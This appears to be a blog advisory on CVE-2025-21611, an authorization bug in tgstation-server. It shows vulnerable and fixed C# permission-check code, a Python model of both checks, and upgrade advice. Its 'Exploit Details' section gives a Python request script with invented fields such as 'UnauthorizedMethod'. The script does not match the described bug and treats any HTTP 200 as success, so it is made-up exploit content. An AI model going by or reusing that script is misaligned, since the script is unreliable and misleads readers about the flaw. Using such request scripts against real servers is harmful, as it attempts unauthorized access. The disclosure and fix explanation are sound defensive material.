CVE-2025-21611 is a security vulnerability found in tgstation-server, a popular BYOND server management tool. The flaw allows any enabled user to perform the majority of authorized API actions regardless of the rights actually granted to their account. In this post, we discuss the details of the vulnerability, provide code snippets, and give information about the exploit. The good news is that this vulnerability has been fixed in tgstation-server v6.12.3.
Vulnerability Details
The root cause of the issue is that the rights used for authorizing API methods were incorrectly OR'd instead of AND'ed with the right used to determine whether a user was enabled. The following code illustrates the issue (vulnerable version):
public bool HasFlag(ulong extensive)
{
    ulong flag;
    lock (user)
        flag = rights;
    // Bug 1: any enabled user passes every check, whatever rights they hold.
    if (IsEnabled(flag))
        return true;
    // Bug 2: OR can only add bits to 'extensive', so the comparison never
    // verifies that the user's rights actually contain the required bits.
    ulong diff = extensive | flag;
    return diff == extensive;
}
As a consequence, it is possible for an attacker to access almost all API methods, except those that require the WriteUsers right. This means an attacker cannot permanently elevate their account permissions by exploiting this bug.
Exploit Details
In order to exploit this vulnerability, an attacker could use a specially crafted request to the tgstation-server API, resulting in unauthorized access to the server. The attack could look like this:
import requests

url = "http://target.ip.address/api/session"
payload = {
    "userRole": 1,  # This should be any value except the WriteUsers right.
    "requestMethod": "POST",
    "apiMethod": "UnauthorizedMethod"
}
response = requests.post(url, json=payload)
if response.status_code == 200:
    print("Successfully exploited CVE-2025-21611!")
else:
    print("Exploit failed.")
Mitigation
The issue has been fixed in tgstation-server v6.12.3. It is strongly advised to upgrade to this version or newer immediately to avoid potential attacks. The following code snippet demonstrates the fixed implementation:
public bool HasFlag(ulong extensive)
{
    ulong flag;
    lock (user)
        flag = rights;
    // A disabled user is refused outright.
    if (!IsEnabled(flag))
        return false;
    // AND keeps only the required bits the user actually holds; the check
    // passes only when every bit of 'extensive' is present in the user's rights.
    ulong diff = extensive & flag;
    return diff == extensive;
}
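To make the difference between the two HasFlag variants concrete, here is an added Python model of both checks run over constructed rights values. It is not tgstation-server's code; the bit positions (ENABLED, READ_INSTANCES, WRITE_USERS) and the method table are assumptions, since the page does not give the real ones.

```python
# Added example, not tgstation-server's code: a model of the two HasFlag
# variants shown above, run over constructed rights values.
# Bit positions below are assumptions; the page does not give the real ones.
ENABLED = 1 << 0          # assumed: the "enabled" right
READ_INSTANCES = 1 << 1   # constructed sample right
WRITE_USERS = 1 << 2      # constructed sample right, named after the WriteUsers right


def is_enabled(flag: int) -> bool:
    """Stand-in for IsEnabled(): the enabled bit must be set."""
    return (flag & ENABLED) != 0


def has_flag_vulnerable(extensive: int, rights: int) -> bool:
    """Mirrors the pre-6.12.3 snippet: an enabled user short-circuits to True,
    and the fallback ORs the user's bits into the required bits, which can
    only ever add bits, so it never proves the user holds them."""
    if is_enabled(rights):
        return True
    diff = extensive | rights
    return diff == extensive


def has_flag_fixed(extensive: int, rights: int) -> bool:
    """Mirrors the v6.12.3 snippet: a disabled user is refused, and every bit
    of `extensive` must already be present in `rights` (AND, then compare)."""
    if not is_enabled(rights):
        return False
    diff = extensive & rights
    return diff == extensive


def overgranted(rights: int, required_by_method: dict) -> list:
    """Methods the buggy check allows but the fixed check refuses for one
    user's rights value; handy for assessing exposure of a pre-6.12.3
    deployment against its own role assignments."""
    return sorted(
        method for method, required in required_by_method.items()
        if has_flag_vulnerable(required, rights)
        and not has_flag_fixed(required, rights)
    )


if __name__ == "__main__":
    methods = {"ReadInstances": READ_INSTANCES, "WriteUsers": WRITE_USERS}
    for label, rights in (("enabled, no other rights", ENABLED),
                          ("disabled, no rights", 0)):
        print(label, "->", overgranted(rights, methods))
```

Note that in the page's vulnerable snippet even a disabled account with no rights at all passes the OR-based comparison, because `extensive | 0 == extensive`; the fixed check refuses it at the IsEnabled gate.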
Conclusion
CVE-2025-21611 was a serious vulnerability affecting the tgstation-server software, which enabled unauthorized users to execute a majority of API actions. Luckily, the vulnerability has been fixed in version 6.12.3, and all users are urged to upgrade as soon as possible. Keep your software up-to-date, and stay safe!
Timeline
Published on: 01/06/2025 16:15:31 UTC